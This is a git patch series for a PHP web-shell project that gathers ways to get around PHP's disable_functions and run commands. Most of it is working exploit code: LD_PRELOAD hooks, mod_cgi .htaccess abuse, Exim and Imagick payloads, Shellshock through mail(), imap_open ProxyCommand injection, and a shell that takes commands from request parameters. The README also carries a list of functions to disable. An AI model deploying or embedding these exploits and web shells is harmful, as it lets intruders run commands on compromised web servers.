From 838f2a39a3d8f278c6ba47b4393c96e1be5cfaed Mon Sep 17 00:00:00 2001 From: l3m0n Date: Mon, 16 Jul 2018 19:11:08 +0800 Subject: [PATCH 01/16] update some exp --- exp/LD_PRELOAD/exp.php | 4 ++++ exp/LD_PRELOAD/hack.c | 18 ++++++++++++++ exp/apache_mod_cgi/exp.php | 30 +++++++++++++++++++++++ exp/dl/exp.php | 5 ++++ exp/exim/exp.php | 12 ++++++++++ exp/imagick/exp.php | 49 ++++++++++++++++++++++++++++++++++++++ exp/mail/exp.php | 32 +++++++++++++++++++++++++ exp/pcntl_exec/exp.php | 5 ++++ function_check.php | 34 +++++++++++++------------- 9 files changed, 172 insertions(+), 17 deletions(-) create mode 100644 exp/LD_PRELOAD/exp.php create mode 100644 exp/LD_PRELOAD/hack.c create mode 100644 exp/apache_mod_cgi/exp.php create mode 100644 exp/dl/exp.php create mode 100644 exp/exim/exp.php create mode 100644 exp/imagick/exp.php create mode 100644 exp/mail/exp.php create mode 100644 exp/pcntl_exec/exp.php diff --git a/exp/LD_PRELOAD/exp.php b/exp/LD_PRELOAD/exp.php new file mode 100644 index 0000000..810334f --- /dev/null +++ b/exp/LD_PRELOAD/exp.php @@ -0,0 +1,4 @@ + \ No newline at end of file diff --git a/exp/LD_PRELOAD/hack.c b/exp/LD_PRELOAD/hack.c new file mode 100644 index 0000000..67fc33b --- /dev/null +++ b/exp/LD_PRELOAD/hack.c @@ -0,0 +1,18 @@ +#include +#include +#include + +void payload() { + system("rm /tmp/check.txt"); +} + +int geteuid() { +if (getenv("LD_PRELOAD") == NULL) { return 0; } +unsetenv("LD_PRELOAD"); +payload(); +} + +/* +$ gcc -c -fPIC hack.c -o hack +$ gcc -shared hack -o hack.so + */ \ No newline at end of file diff --git a/exp/apache_mod_cgi/exp.php b/exp/apache_mod_cgi/exp.php new file mode 100644 index 0000000..69fe0bd --- /dev/null +++ b/exp/apache_mod_cgi/exp.php @@ -0,0 +1,30 @@ +\n"; +} +if (!isset($_GET['checked'])) { + @file_put_contents('.htaccess', "\nSetEnv HTACCESS on", FILE_APPEND); //Append it to a .htaccess file to see whether .htaccess is allowed + header('Location: ' . $_SERVER['PHP_SELF'] . '?checked=true'); //execute the script again to see if the htaccess test worked +} else { + $modcgi = in_array('mod_cgi', apache_get_modules()); // mod_cgi enabled? + $writable = is_writable('.'); //current dir writable? + $htaccess = !empty($_SERVER['HTACCESS']); //htaccess enabled? + checkEnabled("Mod-Cgi enabled", $modcgi, "Yes", "No"); + checkEnabled("Is writable", $writable, "Yes", "No"); + checkEnabled("htaccess working", $htaccess, "Yes", "No"); + if (!($modcgi && $writable && $htaccess)) { + echo "Error. All of the above must be true for the script to work!"; //abort if not + } else { + checkEnabled("Backing up .htaccess", copy(".htaccess", ".htaccess.bak"), "Suceeded! Saved in .htaccess.bak", "Failed!"); //make a backup, cause you never know. + checkEnabled("Write .htaccess file", file_put_contents('.htaccess', "Options +ExecCGI\nAddHandler cgi-script .dizzle"), "Succeeded!", "Failed!"); //.dizzle is a nice extension + checkEnabled("Write shell file", file_put_contents('shell.dizzle', $shellfile), "Succeeded!", "Failed!"); //write the file + checkEnabled("Chmod 777", chmod("shell.dizzle", 0777), "Succeeded!", "Failed!"); //rwx + echo "Executing the script now. Check your listener "; //call the script + } +} +?> \ No newline at end of file diff --git a/exp/dl/exp.php b/exp/dl/exp.php new file mode 100644 index 0000000..755eac7 --- /dev/null +++ b/exp/dl/exp.php @@ -0,0 +1,5 @@ +自写插件,自定义函数,调用system函数 +1.txt"); +?> \ No newline at end of file diff --git a/exp/exim/exp.php b/exp/exim/exp.php new file mode 100644 index 0000000..7dc33f0 --- /dev/null +++ b/exp/exim/exp.php @@ -0,0 +1,12 @@ +' . $result_file; +file_put_contents($tmp_file, $command); +$payload = "-be \${run{/bin/bash\${substr{10}{1}{\$tod_log}}/tmp/aaaaaaaaaaa.sh}{ok}{error}}"; +mail("a@localhost", "", "", "", $payload); +echo file_get_contents($result_file); +@unlink($tmp_file); +@unlink($result_file); +?> \ No newline at end of file diff --git a/exp/imagick/exp.php b/exp/imagick/exp.php new file mode 100644 index 0000000..387daca --- /dev/null +++ b/exp/imagick/exp.php @@ -0,0 +1,49 @@ +# Exploit Title: PHP Imagick disable_functions Bypass +# Date: 2016-05-04 +# Exploit Author: RicterZ (ricter@chaitin.com) +# Vendor Homepage: https://pecl.php.net/package/imagick +# Version: Imagick <= 3.3.0 PHP >= 5.4 +# Test on: Ubuntu 12.04 + +# Exploit: + + +# +# $ curl "127.0.0.1:8080/exploit.php?cmd=cat%20/etc/passwd" +# 
+# Disable functions: exec,passthru,shell_exec,system,popen
+# Run command: cat /etc/passwd
+# ====================
+# root:x:0:0:root:/root:/usr/local/bin/fish
+# daemon:x:1:1:daemon:/usr/sbin:/bin/sh
+# bin:x:2:2:bin:/bin:/bin/sh
+# sys:x:3:3:sys:/dev:/bin/sh
+# sync:x:4:65534:sync:/bin:/bin/sync
+# games:x:5:60:games:/usr/games:/bin/sh
+# ...
+#
+echo "Disable functions: " . ini_get("disable_functions") . "\n"; +$command = isset($_GET['cmd']) ? $_GET['cmd'] : 'id'; +echo "Run command: $command\n====================\n"; + +$data_file = tempnam('/tmp', 'img'); +$imagick_file = tempnam('/tmp', 'img'); + +$exploit = <<$data_file")' +pop graphic-context +EOF; + +file_put_contents("$imagick_file", $exploit); +$thumb = new Imagick(); +$thumb->readImage("$imagick_file"); +$thumb->writeImage(tempnam('/tmp', 'img')); +$thumb->clear(); +$thumb->destroy(); + +echo file_get_contents($data_file); +?> \ No newline at end of file diff --git a/exp/mail/exp.php b/exp/mail/exp.php new file mode 100644 index 0000000..d114e41 --- /dev/null +++ b/exp/mail/exp.php @@ -0,0 +1,32 @@ +$tmp 2>&1"); + // In Safe Mode, the user may only alter environment variableswhose names + // begin with the prefixes supplied by this directive. + // By default, users will only be able to set environment variablesthat + // begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive isempty, + // PHP will let the user modify ANY environment variable! + mail("a@127.0.0.1", "", "", "", "-bv"); // -bv so we don't actuallysend any mail + $output = @file_get_contents($tmp); + @unlink($tmp); + if ($output != "") { + return $output; + } else { + return "No output, or not vuln."; + } + +} +echo shellshock($_REQUEST["cmd"]); +?> \ No newline at end of file diff --git a/exp/pcntl_exec/exp.php b/exp/pcntl_exec/exp.php new file mode 100644 index 0000000..49e734e --- /dev/null +++ b/exp/pcntl_exec/exp.php @@ -0,0 +1,5 @@ +#exec.php + +#/tmp/b4dboy.sh +#!/bin/bash +ls -l / \ No newline at end of file diff --git a/function_check.php b/function_check.php index 1c47a21..d9b52d9 100644 --- a/function_check.php +++ b/function_check.php @@ -2,7 +2,7 @@ $def $text
"; - - } - +function msg($text,$type=0){ + + $def="[*]"; + $color="green"; + if($type ==1){ + + $def="[+]" ; + $color="red"; + }else if ($type==-1){ + + $def="[-]"; + } + echo "$def $text
"; + +} + From b87b368d4ff0ba05d3f0a28188cce246292f907c Mon Sep 17 00:00:00 2001 From: l3m0n Date: Mon, 16 Jul 2018 19:14:44 +0800 Subject: [PATCH 02/16] =?UTF-8?q?=E4=BC=98=E5=8C=96=E4=B8=80=E4=BA=9B?= =?UTF-8?q?=E5=86=85=E5=AE=B9?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- README.md | 71 +++++++++++++++++++++++++++++++++++++++++ bypass.php | 28 +++++++++++++++++ bypass_function.md | 78 ---------------------------------------------- function_check.php | 46 --------------------------- 4 files changed, 99 insertions(+), 124 deletions(-) delete mode 100644 bypass_function.md delete mode 100644 function_check.php diff --git a/README.md b/README.md index 4f8b2a6..2920d5b 100644 --- a/README.md +++ b/README.md @@ -1,2 +1,73 @@ # Bypass_Disable_functions_Shell 一个各种方式突破Disable_functions达到命令执行的shell + +### 功能 +##### 利用环境变量LD_PRELOAD来绕过 + +http://drops.wooyun.org/tips/16054 + +##### ImageMagick绕过 + +http://drops.wooyun.org/papers/15589 + +https://www.exploit-db.com/exploits/39766/ + +##### imagecreatefromgd2 + +https://github.com/l3m0n/exploits/tree/master/CVE-2016-3074 + +##### test + +https://github.com/l3m0n/exploits/tree/master/CVE-2016-3078 + +##### PHP OPcache + +http://www.myhack58.com/Article/html/3/62/2016/74160.htm + +http://blog.gosecure.ca/2016/04/27/binary-webshell-through-opcache-in-php-7/ + +##### mail函数 + +https://www.leavesongs.com/PHP/php-bypass-disable-functions-by-CVE-2014-6271.html + +https://www.exploit-db.com/exploits/35146/ + +##### 利用pcntl_exec突破 + +http://www.cnseay.com/2632/comment-page-1/ + +``` +#exec.php + +#/tmp/b4dboy.sh +#!/bin/bash +ls -l / +``` + +##### 破壳bash漏洞 + +##### dl + +https://www.exploit-db.com/docs/38104.pdf + +##### PHP 5.x - COM functions safe_mode and disable_function bypass + +https://www.exploit-db.com/exploits/4553/ + +https://www.exploit-db.com/exploits/4517/ + +##### win_shell_execute + +https://www.exploit-db.com/exploits/4218/ + +##### Bypass PHP system functions disabled via mod_cgi + +http://0cx.cc/bypass_disabled_via_mod_cgi.jspx + +##### mail的exim扩展bypass +http://www.cnblogs.com/iamstudy/articles/Exim_mail_bypass_disable_function.html + +### 防御 +dl,exec,system,passthru,popen,proc_open,pcntl_exec,shell_exec,mail + + diff --git a/bypass.php b/bypass.php index 36e2a40..7989d7b 100644 --- a/bypass.php +++ b/bypass.php @@ -2,6 +2,34 @@ //from silic-webshell //usage: http://lemon.love:8081/bypass.php?cmd=ipconfig +msg("php enable_functions enumeration script"); +$func_arr=array('dl','exec','system','passthru','popen','proc_open','pcntl_exec','shell_exec','mail','symlink','putenv') +$dis_func_arr = explode(",",get_cfg_var("disable_functions")); + +if($dis_func_arr[0]){ + foreach ($func_arr as $func) { + if(!in_array($func,$dis_func_arr)){ + msg("Function: $func enable",1); + } + } +}else{ + msg("disable_functions none !!!",1); +} +function msg($text,$type=0){ + + $def="[*]"; + $color="green"; + if($type ==1){ + + $def="[+]" ; + $color="red"; + }else if ($type==-1){ + + $def="[-]"; + } + echo "$def $text
"; +} + function Exec_Run($cmd) { $res = ''; if (function_exists('exec')) { diff --git a/bypass_function.md b/bypass_function.md deleted file mode 100644 index e1d674c..0000000 --- a/bypass_function.md +++ /dev/null @@ -1,78 +0,0 @@ - - -### 功能 -##### 利用环境变量LD_PRELOAD来绕过 - -http://drops.wooyun.org/tips/16054 - -##### ImageMagick绕过 - -http://drops.wooyun.org/papers/15589 - -https://www.exploit-db.com/exploits/39766/ - -##### imagecreatefromgd2 - -https://github.com/l3m0n/exploits/tree/master/CVE-2016-3074 - -##### test - -https://github.com/l3m0n/exploits/tree/master/CVE-2016-3078 - -##### PHP OPcache - -http://www.myhack58.com/Article/html/3/62/2016/74160.htm - -http://blog.gosecure.ca/2016/04/27/binary-webshell-through-opcache-in-php-7/ - -##### mail函数 - -https://www.leavesongs.com/PHP/php-bypass-disable-functions-by-CVE-2014-6271.html - -https://www.exploit-db.com/exploits/35146/ - -##### 利用pcntl_exec突破 - -http://www.cnseay.com/2632/comment-page-1/ - -``` -#exec.php - -#/tmp/b4dboy.sh -#!/bin/bash -ls -l / -``` - -##### 破壳bash漏洞 - -##### dl - -https://www.exploit-db.com/docs/38104.pdf - -##### PHP 5.x - COM functions safe_mode and disable_function bypass - -https://www.exploit-db.com/exploits/4553/ - -https://www.exploit-db.com/exploits/4517/ - -##### win_shell_execute - -https://www.exploit-db.com/exploits/4218/ - -##### Bypass PHP system functions disabled via mod_cgi - -http://0cx.cc/bypass_disabled_via_mod_cgi.jspx - -##### mail的exim扩展bypass -http://www.cnblogs.com/iamstudy/articles/Exim_mail_bypass_disable_function.html - -### 防御 -dl -exec -system -passthru -popen -proc_open -pcntl_exec -shell_exec -mail diff --git a/function_check.php b/function_check.php deleted file mode 100644 index d9b52d9..0000000 --- a/function_check.php +++ /dev/null @@ -1,46 +0,0 @@ - - $func enable",1); - - } - } - - - }else{ - - msg("disable_functions none !!!",1); - - } - -function msg($text,$type=0){ - - $def="[*]"; - $color="green"; - if($type ==1){ - - $def="[+]" ; - $color="red"; - }else if ($type==-1){ - - $def="[-]"; - } - echo "$def $text
"; - -} - - - - - -?> \ No newline at end of file From d3421c2099ec777237f19f5b639e04c53851e5e0 Mon Sep 17 00:00:00 2001 From: l3m0n Date: Mon, 16 Jul 2018 19:15:57 +0800 Subject: [PATCH 03/16] now --- README.md | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 2920d5b..24fe6cd 100644 --- a/README.md +++ b/README.md @@ -1,6 +1,9 @@ # Bypass_Disable_functions_Shell 一个各种方式突破Disable_functions达到命令执行的shell +### 防御 +dl,exec,system,passthru,popen,proc_open,pcntl_exec,shell_exec,mail + ### 功能 ##### 利用环境变量LD_PRELOAD来绕过 @@ -67,7 +70,5 @@ http://0cx.cc/bypass_disabled_via_mod_cgi.jspx ##### mail的exim扩展bypass http://www.cnblogs.com/iamstudy/articles/Exim_mail_bypass_disable_function.html -### 防御 -dl,exec,system,passthru,popen,proc_open,pcntl_exec,shell_exec,mail From 727cbeb8b1ab8aa90e74f5f9bfe8988955996da7 Mon Sep 17 00:00:00 2001 From: l3m0n Date: Mon, 10 Sep 2018 13:34:23 +0800 Subject: [PATCH 04/16] Update bypass.php fix some bug --- bypass.php | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/bypass.php b/bypass.php index 7989d7b..662cd76 100644 --- a/bypass.php +++ b/bypass.php @@ -3,7 +3,7 @@ //usage: http://lemon.love:8081/bypass.php?cmd=ipconfig msg("php enable_functions enumeration script"); -$func_arr=array('dl','exec','system','passthru','popen','proc_open','pcntl_exec','shell_exec','mail','symlink','putenv') +$func_arr=array('dl','exec','system','passthru','popen','proc_open','pcntl_exec','shell_exec','mail','symlink','putenv'); $dis_func_arr = explode(",",get_cfg_var("disable_functions")); if($dis_func_arr[0]){ From 7228c8ace18794b7daf6c79c564e7027b466a3de Mon Sep 17 00:00:00 2001 From: l3m0n Date: Thu, 15 Nov 2018 10:25:08 +0800 Subject: [PATCH 05/16] add imap_open bypass --- README.md | 2 +- bypass.php | 42 +++++++++++++++++++++--------------------- exp/imap_open/exp.php | 11 +++++++++++ 3 files changed, 33 insertions(+), 22 deletions(-) create mode 100644 exp/imap_open/exp.php diff --git a/README.md b/README.md index 24fe6cd..18bba34 100644 --- a/README.md +++ b/README.md @@ -2,7 +2,7 @@ 一个各种方式突破Disable_functions达到命令执行的shell ### 防御 -dl,exec,system,passthru,popen,proc_open,pcntl_exec,shell_exec,mail +dl,exec,system,passthru,popen,proc_open,pcntl_exec,shell_exec,mail,imap_open ### 功能 ##### 利用环境变量LD_PRELOAD来绕过 diff --git a/bypass.php b/bypass.php index 7989d7b..4ccd481 100644 --- a/bypass.php +++ b/bypass.php @@ -3,29 +3,29 @@ //usage: http://lemon.love:8081/bypass.php?cmd=ipconfig msg("php enable_functions enumeration script"); -$func_arr=array('dl','exec','system','passthru','popen','proc_open','pcntl_exec','shell_exec','mail','symlink','putenv') -$dis_func_arr = explode(",",get_cfg_var("disable_functions")); +$func_arr = array('imap_open', 'dl', 'exec', 'system', 'passthru', 'popen', 'proc_open', 'pcntl_exec', 'shell_exec', 'mail', 'symlink', 'putenv'); +$dis_func_arr = explode(",", get_cfg_var("disable_functions")); -if($dis_func_arr[0]){ - foreach ($func_arr as $func) { - if(!in_array($func,$dis_func_arr)){ - msg("Function: $func enable",1); - } - } -}else{ - msg("disable_functions none !!!",1); +if ($dis_func_arr[0]) { + foreach ($func_arr as $func) { + if (!in_array($func, $dis_func_arr)) { + msg("Function: $func enable", 1); + } + } +} else { + msg("disable_functions none !!!", 1); } -function msg($text,$type=0){ - - $def="[*]"; - $color="green"; - if($type ==1){ - - $def="[+]" ; - $color="red"; - }else if ($type==-1){ - - $def="[-]"; +function msg($text, $type = 0) { + + $def = "[*]"; + $color = "green"; + if ($type == 1) { + + $def = "[+]"; + $color = "red"; + } else if ($type == -1) { + + $def = "[-]"; } echo "$def $text
"; } diff --git a/exp/imap_open/exp.php b/exp/imap_open/exp.php new file mode 100644 index 0000000..77f3994 --- /dev/null +++ b/exp/imap_open/exp.php @@ -0,0 +1,11 @@ +/tmp/test0001 + +error_reporting(0); +if (!function_exists('imap_open')) { + die("no imap_open function!"); +} +$server = "x -oProxyCommand=echo\t" . base64_encode($_GET['cmd'] . ">/tmp/cmd_result") . "|base64\t-d|sh}"; +imap_open('{' . $server . ':143/imap}INBOX', '', ''); // or var_dump("\n\nError: ".imap_last_error()); +echo file_get_contents("/tmp/cmd_result"); \ No newline at end of file From 0c70407570a0df6e846bb069b310418eb91c7c0c Mon Sep 17 00:00:00 2001 From: l3m0n Date: Thu, 15 Nov 2018 10:43:24 +0800 Subject: [PATCH 06/16] update readme.md --- README.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/README.md b/README.md index 18bba34..dc99985 100644 --- a/README.md +++ b/README.md @@ -5,6 +5,9 @@ dl,exec,system,passthru,popen,proc_open,pcntl_exec,shell_exec,mail,imap_open ### 功能 +##### imap_open bypass +https://antichat.com/threads/463395/#post-4254681 + ##### 利用环境变量LD_PRELOAD来绕过 http://drops.wooyun.org/tips/16054 From 805a7b2a6bb31a79e8e430baf59a61dcdb458a7e Mon Sep 17 00:00:00 2001 From: l3m0n Date: Sat, 22 Dec 2018 13:24:47 +0800 Subject: [PATCH 07/16] update imap_mail function, somelike mail function --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index dc99985..0ed333a 100644 --- a/README.md +++ b/README.md @@ -2,7 +2,7 @@ 一个各种方式突破Disable_functions达到命令执行的shell ### 防御 -dl,exec,system,passthru,popen,proc_open,pcntl_exec,shell_exec,mail,imap_open +dl,exec,system,passthru,popen,proc_open,pcntl_exec,shell_exec,mail,imap_open,imap_mail,putenv ### 功能 ##### imap_open bypass From cbed5d9c4dfc3c578456ac0f2936962bf34a7758 Mon Sep 17 00:00:00 2001 From: l3m0n Date: Sat, 22 Dec 2018 13:34:28 +0800 Subject: [PATCH 08/16] update --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 0ed333a..e726838 100644 --- a/README.md +++ b/README.md @@ -2,7 +2,7 @@ 一个各种方式突破Disable_functions达到命令执行的shell ### 防御 -dl,exec,system,passthru,popen,proc_open,pcntl_exec,shell_exec,mail,imap_open,imap_mail,putenv +dl,exec,system,passthru,popen,proc_open,pcntl_exec,shell_exec,mail,imap_open,imap_mail,putenv,ini_set,apache_setenv,symlink,link ### 功能 ##### imap_open bypass From 06ad421c4d063a58dbd1309b193565cf34b5317b Mon Sep 17 00:00:00 2001 From: l3m0n Date: Thu, 2 May 2019 22:55:49 +0800 Subject: [PATCH 09/16] update readme.md --- README.md | 73 ++++++------------------------------------------------- 1 file changed, 7 insertions(+), 66 deletions(-) diff --git a/README.md b/README.md index e726838..a312b07 100644 --- a/README.md +++ b/README.md @@ -1,77 +1,18 @@ -# Bypass_Disable_functions_Shell -一个各种方式突破Disable_functions达到命令执行的shell +# Bypass Disable Functions Shell -### 防御 -dl,exec,system,passthru,popen,proc_open,pcntl_exec,shell_exec,mail,imap_open,imap_mail,putenv,ini_set,apache_setenv,symlink,link - -### 功能 -##### imap_open bypass -https://antichat.com/threads/463395/#post-4254681 - -##### 利用环境变量LD_PRELOAD来绕过 - -http://drops.wooyun.org/tips/16054 - -##### ImageMagick绕过 - -http://drops.wooyun.org/papers/15589 - -https://www.exploit-db.com/exploits/39766/ - -##### imagecreatefromgd2 - -https://github.com/l3m0n/exploits/tree/master/CVE-2016-3074 - -##### test - -https://github.com/l3m0n/exploits/tree/master/CVE-2016-3078 - -##### PHP OPcache - -http://www.myhack58.com/Article/html/3/62/2016/74160.htm - -http://blog.gosecure.ca/2016/04/27/binary-webshell-through-opcache-in-php-7/ - -##### mail函数 - -https://www.leavesongs.com/PHP/php-bypass-disable-functions-by-CVE-2014-6271.html - -https://www.exploit-db.com/exploits/35146/ - -##### 利用pcntl_exec突破 - -http://www.cnseay.com/2632/comment-page-1/ +禁用函数列表(希望能做最全的禁用列表,也可以用此做对比进行绕过): ``` -#exec.php - -#/tmp/b4dboy.sh -#!/bin/bash -ls -l / +dl,exec,system,passthru,popen,proc_open,pcntl_exec,shell_exec,mail,imap_open,imap_mail,putenv,ini_set,apache_setenv,symlink,link ``` -##### 破壳bash漏洞 - -##### dl - -https://www.exploit-db.com/docs/38104.pdf - -##### PHP 5.x - COM functions safe_mode and disable_function bypass - -https://www.exploit-db.com/exploits/4553/ - -https://www.exploit-db.com/exploits/4517/ - -##### win_shell_execute - -https://www.exploit-db.com/exploits/4218/ -##### Bypass PHP system functions disabled via mod_cgi +目录结构: +- env - docker环境, 用于测试各类绕过exp +- papar - bypass原理 +- exp - bypass脚本 -http://0cx.cc/bypass_disabled_via_mod_cgi.jspx -##### mail的exim扩展bypass -http://www.cnblogs.com/iamstudy/articles/Exim_mail_bypass_disable_function.html From 77db29e0c156f859f263e91167c74ebd0a08a411 Mon Sep 17 00:00:00 2001 From: l3m0n Date: Tue, 18 Jun 2019 11:14:00 +0800 Subject: [PATCH 10/16] new shell init --- .idea/dictionaries/l3m0n.xml | 3 + .idea/vcs.xml | 6 + ant.php | 7 + exp/so/php_so.c | 0 exp/so/system_so.c | 0 shell.php | 528 +++++++++++++++++++++++++++++++++++ test.php | 7 + 7 files changed, 551 insertions(+) create mode 100644 .idea/dictionaries/l3m0n.xml create mode 100644 .idea/vcs.xml create mode 100644 ant.php create mode 100644 exp/so/php_so.c create mode 100644 exp/so/system_so.c create mode 100644 shell.php create mode 100644 test.php diff --git a/.idea/dictionaries/l3m0n.xml b/.idea/dictionaries/l3m0n.xml new file mode 100644 index 0000000..d245da0 --- /dev/null +++ b/.idea/dictionaries/l3m0n.xml @@ -0,0 +1,3 @@ + + + \ No newline at end of file diff --git a/.idea/vcs.xml b/.idea/vcs.xml new file mode 100644 index 0000000..94a25f7 --- /dev/null +++ b/.idea/vcs.xml @@ -0,0 +1,6 @@ + + + + + + \ No newline at end of file diff --git a/ant.php b/ant.php new file mode 100644 index 0000000..c7fe53f --- /dev/null +++ b/ant.php @@ -0,0 +1,7 @@ + array("exec", "shell_exec", "system", "passthru", "popen", "proc_open"), +// "load_so" => array("dl"), +// "ld_preload_so" => array("mail", "error_log", "imap_mail", "mb_send_mail"), +// "shellshock" => array("mail"), +// "apache_mod_cgi" => array(), +// "imagick" => array(), +// "pwn" => array(), +//); + +echo "Temp Dir:" . WRITE_DIR . "
"; +echo "Arch: " . ARCH . "; OS: " . OS . "

"; + +foreach ($vul_function_arr as $func) { + if (function_exists($func)){ + echo "Exist: ".$func."
"; + } else { + echo "no exist: ".$func."
"; + } +} + +function read_file($filename){ + if(function_exists('file_get_contents')){ + return file_get_contents($filename); + } elseif (function_exists('fopen') && function_exists('fread')){ + $handle = fopen($filename, 'r'); + $content = ''; + while(!feof($handle)){ + $content .= fread($handle, 1000); + } + fclose($handle); + return $content; + } else { + echo "no read function"; + return; + } +} + +function write_file($filename, $content, $model="w"){ + if (function_exists('file_put_contents')) { + file_put_contents($filename, $content); + } else { + echo "no write function"; + return; + } +} + +function random_str($len = 8) { + $s = ''; + for ($i = 0; $i < $len; $i++) { + $s .= chr(mt_rand(33, 126)); + } + return $s; +} + +function is_x64() { + $int = "9223372036854775807"; + $int = intval($int); + if ($int == 9223372036854775807) { + return true; + } + elseif ($int == 2147483647) { + return false; + } + else { + return "error"; + } +} + +function trans_cmd($cmd, $outfile){ + if (OS == 'Windows'){ + $cmd = $cmd . " > " . $outfile; + }else{ + $cmd = $cmd . " > " . $outfile . " 2>&1"; + } + return $cmd; +} + +function send_cmd_to_file($cmd, $file = 'cmd', $result = 'result') { + $outfile = WRITE_DIR . $result; + $cmdfile = WRITE_DIR . $file; + + $cmd = trans_cmd($cmd, $outfile); + + write_file($cmdfile, $cmd); + return array( + $cmdfile, + $outfile + ); +} + +function send_cmd($cmd, $result = 'result') { + $outfile = WRITE_DIR . $result; + + $cmd = trans_cmd($cmd, $outfile); + + return array( + $cmd, + $outfile + ); +} + +function recv_result($result = 'result') { + $ret = read_file($result); + @unlink($result); + return $ret; +} + +function send_socket($data, $host, $port=9000) { + if ( function_exists('stream_socket_client') ) { + if (strpos($host,'unix://') !== false) { + $client = $host; + } else { + $client = 'tcp://' . $host . ':' . $port; + } + + $fp = stream_socket_client($client); + } elseif (function_exists('fsockopen')) { + $fp = fsockopen($host, $port, $errno, $errstr, 30); + } else { + return FAILURE; + } + + if ($fp) { + $content = ""; + fwrite($fp, $data); + while (!feof($fp)) { + $content .= fgets($fp, 4096); + } + fclose($fp); + return $content; + } else { + return FAILURE; + } +} + +/* + * 第一种: 常规绕过, 寻找漏掉的命令执行函数, 适用于winodws + linux + * exec、shell_exec、system、passthru、popen、proc_open + */ + +function common_exec_cmd($cmd) { + $res = ''; + if (function_exists('exec')) { + @exec($cmd, $res); + $res = join("\n", $res); + } elseif (function_exists('shell_exec')) { + $res = @shell_exec($cmd); + } elseif (function_exists('system')) { + @ob_start(); + @system($cmd); + $res = @ob_get_contents(); + @ob_end_clean(); + } elseif (function_exists('passthru')) { + @ob_start(); + @passthru($cmd); + $res = @ob_get_contents(); + @ob_end_clean(); + } elseif (@is_resource($f = @popen($cmd, "r"))) { + $res = ''; + while (!@feof($f)) {$res .= @fread($f, 1024);} + @pclose($f); + } elseif (function_exists('proc_open')) { + $descriptorspec = array( + 0 => array("pipe", "r"), + 1 => array("pipe", "w"), + 2 => array("pipe", "w") + ); + $process = proc_open($cmd, $descriptorspec, $pipes, null, null); + if (is_resource($process)) { + fwrite($pipes[0], '$stdin'); + fclose($pipes[0]); + $res = stream_get_contents($pipes[1]); + }else{ + return FAILURE; + } + } else { + return FAILURE; + } + return $res; +} + +/* + * 第二种: pcntl_exec绕过 + */ + +function pcntl_exec_cmd($cmd) { + if (function_exists('pcntl_exec')) { + $cmd_arr = send_cmd_to_file($cmd, 'cmd.sh'); + pcntl_exec("/bin/bash", array($cmd_arr[0])); + return recv_result($cmd_arr[1]); + } else { + return FAILURE; + } +} + +//echo pcntl_exec_cmd("id"); + +/* + * 第三种: ld_preload绕过: 仅限Linux + * mail、imap_mail、error_log、mb_send_mail + * From: https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD/ + */ + +function ld_preload_exec_cmd($cmd) { + $so_file = WRITE_DIR . 'system.so'; + + if (ARCH === 64) { + write_file($so_file, hex2bin($GLOBALS['system_so_x64'])); + } else { + write_file($so_file, hex2bin($GLOBALS['system_so_x32'])); + } + + $cmd_arr = send_cmd($cmd, 'result'); + putenv("EVIL_CMDLINE=" . $cmd_arr[0]); + putenv("LD_PRELOAD=" . $so_file); + + if (function_exists('error_log')){ + error_log("", 1, "example@example.com"); + } elseif (function_exists('mail')){ + mail("", "", "", ""); + } elseif (function_exists('mb_send_mail')){ + mb_send_mail("","",""); + } elseif ((function_exists('imap_mail'))){ + imap_mail("","",""); + } else { + @unlink($so_file); + return FAILURE; + } + + // del so file + @unlink($so_file); + return recv_result($cmd_arr[1]); +} + +//echo ld_preload_exec_cmd($_GET['cmd']); + +//$so_file = WRITE_DIR . 'system_x32.so'; +//var_dump(bin2hex(read_file($so_file))); + +/* + * 第四种: ld加载php扩展: + * ld + * https://github.com/Medicean/as_bypass_php_disable_functions + * https://github.com/AntSwordProject/ant_php_extension + */ + +function dl_exec($cmd){ + if(function_exists('dl')){ + $so_file = WRITE_DIR . 'php.so'; + + if (ARCH === 64) { + write_file($so_file, hex2bin($GLOBALS['php_so_x64'])); + } else { + write_file($so_file, hex2bin($GLOBALS['php_so_x32'])); + } + + $so_file = "ant_x64.so"; + dl($so_file); + $result = antsystem($cmd); + + // del so file + @unlink($so_file); + return $result; + }else{ + return FAILURE; + } +} + +//echo dl_exec("id"); + +/* + * 第五种: imap_open: 仅限Linux + */ + +function imap_open_exec($cmd){ + if (function_exists('imap_open')) { + $cmd_arr = send_cmd($cmd); + $server = "x -oProxyCommand=echo\t" . base64_encode($cmd_arr[0]) . "|base64\t-d|sh}"; + imap_open('{' . $server . ':143/imap}INBOX', '', ''); + return recv_result($cmd_arr[1]); + }else{ + return FAILURE; + } +} + +//echo imap_open_exec("id"); + +/* + * exim + */ + +//function exim_exec($cmd){ +// if (function_exists('mail')) { +// $cmd_arr = send_cmd_to_file($cmd); +// $payload = "-be \${run{/bin/bash\${substr{10}{1}{\$tod_log}}".$cmd_arr[0]."}{ok}{error}}"; +// mail("a@localhost", "", "", "", $payload); +// return recv_result($cmd_arr[1]); +// }else{ +// return FAILURE; +// } +//} + +/* + * Imagick类, 选择更加通用的绕过方式吧 + */ + +//function imagick_exec($cmd){ +// if(class_exists('Imagick')){ +// $imagick_file = WRITE_DIR . 'img'; +// +// $cmd_arr = send_cmd($cmd); +// +// $exploit = <<readImage("$imagick_file"); +// $thumb->writeImage(WRITE_DIR . 'tmp'); +// $thumb->clear(); +// $thumb->destroy(); +// +// return recv_result($cmd_arr[1]); +// }else{ +// return 'nonono'; +// } +//} + + +/* + * FastCgi: + * 9000 port + * phpx.x-fpm.sock + * + * Fail: windows + */ + +function p($ptr){ + return bin2hex(chr($ptr)); +} + +function pnv($len){ + if($len < 128){ + return p($len); + }else{ + return p(($len >> 24) |0x80) . p(($len >> 16) & 0xFF) . p(($len >> 8) & 0xFF) . p($len & 0xFF); + } +} + +// 还需要更改具体的fastcgi参数, 目前能在linux下使用 +//$host = 'unix:///run/php/php7.3-fpm.sock'; +function fastcgi_exec($cmd, $file, $host, $port=9000){ + if (strlen($cmd) > 40) { + echo "Bug: command 